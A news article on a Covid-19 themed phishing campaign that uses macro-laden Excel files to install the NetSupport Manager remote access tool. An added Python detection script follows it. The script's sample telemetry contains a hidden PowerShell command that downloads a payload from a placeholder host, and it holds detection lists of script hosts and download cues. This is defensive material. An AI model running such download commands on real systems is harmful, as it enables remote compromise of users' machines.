Microsoft is warning users of a large Covid-19 themed phishing campaign that installs the NetSupport Manager remote administration tool to take complete control of a user’s system and even execute commands remotely.
The Microsoft Security Intelligence team provided additional details about this ongoing campaign in a series of tweets, in which it stated that cybercriminals use malicious Excel attachments to infect users’ devices with a Remote Access Trojan (RAT).
The attack begins with potential victims receiving an email that impersonates the Johns Hopkins Center. The email purports to provide an update on the number of coronavirus-related deaths in the United States, and attached to it is an Excel file that displays a chart of the number of deaths in the United States.
When a user opens the Excel file, it prompts them to “Enable Content”; doing so runs the file’s malicious macros, which download and install the NetSupport Manager client from a remote site.
Covid-19 themed phishing campaign
In one tweet, the Microsoft Security Intelligence team explained that all of the different Excel files used in the campaign connect to the same URL:
“The hundreds of unique Excel files in this campaign use highly obfuscated formulas, but all connect to the same URL to download the payload. NetSupport Manager is known to be abused by attackers in order to remotely access and execute commands on compromised machines.”
Although NetSupport Manager is a legitimate remote administration tool, it is widely distributed in hacking communities, which use it as a RAT. Once a user unknowingly installs NetSupport Manager on their computer, it allows the attackers to take complete control of the infected machine and execute commands remotely. The NetSupport Manager RAT is then used to further compromise the victim’s computer by installing additional tools and scripts.
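The infection chain described above (Excel macro, a script host fetching a payload, then a NetSupport Manager client running from a user profile directory) is visible in ordinary process-creation telemetry. The following is an added detection example, not code from the article or from Microsoft; the process-creation events are constructed for the example, the download URL is a placeholder because the article does not publish the real one, and the assumption that the NetSupport Manager client binary is named client32.exe comes from the editor, not from the page.

```python
"""Flag process-creation events consistent with the Excel-macro -> NetSupport chain.

All events below are constructed sample data; the URL is a placeholder.
"""
from dataclasses import dataclass

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe"}
# Assumption (not stated in the article): client32.exe is the NetSupport Manager client.
NETSUPPORT_IMAGES = {"client32.exe"}
# Command-line fragments that suggest the child process is fetching something.
DOWNLOAD_CUES = ("http://", "https://", "downloadstring", "downloadfile",
                 "invoke-webrequest", "webclient")
# A sanctioned NetSupport install lives under Program Files; anything else is suspect.
SANCTIONED_DIRS = ("\\program files\\", "\\program files (x86)\\")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the list of finding names that apply to one event (empty if benign)."""
    findings: list[str] = []
    parent, child = basename(ev.parent_image), basename(ev.image)
    cmd = ev.command_line.lower()

    # Stage 1: an Office application spawning a script host is how macros run things.
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        findings.append("office_spawns_script_host")
        if any(cue in cmd for cue in DOWNLOAD_CUES):
            findings.append("office_child_downloads_payload")

    # Stage 2: the NetSupport client appearing under a script host or Office app,
    # or running from a user-writable path instead of Program Files.
    if child in NETSUPPORT_IMAGES:
        if parent in SCRIPT_HOSTS or parent in OFFICE_APPS:
            findings.append("netsupport_client_from_script_host")
        if not any(d in ev.image.lower() for d in SANCTIONED_DIRS):
            findings.append("netsupport_client_unsanctioned_path")
    return findings


def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map pid -> findings for every event that triggered at least one rule."""
    return {ev.pid: found for ev in events if (found := classify(ev))}


# Constructed sample telemetry: one user opening the lure, the macro running, the
# RAT starting, plus a legitimately installed NetSupport client for contrast.
SAMPLE_EVENTS = [
    ProcEvent(100, r"C:\Windows\explorer.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r'"EXCEL.EXE" C:\Users\alice\Downloads\covid19_deaths.xls'),
    ProcEvent(101, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c Invoke-WebRequest "
              "http://PLACEHOLDER-PAYLOAD-HOST.example/payload.zip"),
    ProcEvent(102, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Users\alice\AppData\Roaming\nsm\client32.exe",
              r"C:\Users\alice\AppData\Roaming\nsm\client32.exe"),
    ProcEvent(103, r"C:\Windows\explorer.exe",
              r"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe",
              r'"client32.exe"'),
]

if __name__ == "__main__":
    for pid, found in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(found))
```

Event 100 (Excel itself) and event 103 (a NetSupport client under Program Files started by Explorer) produce no findings; events 101 and 102 are flagged as the macro-to-RAT chain. The path rule is what separates the legitimate tool from its abuse here, since the binary is identical in both cases.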
Those who have been victims of this phishing campaign must assume that their data has been compromised and that the attackers have attempted to steal their passwords. After the infected device is cleaned, users must change all of their passwords, including those used on other computers on their network.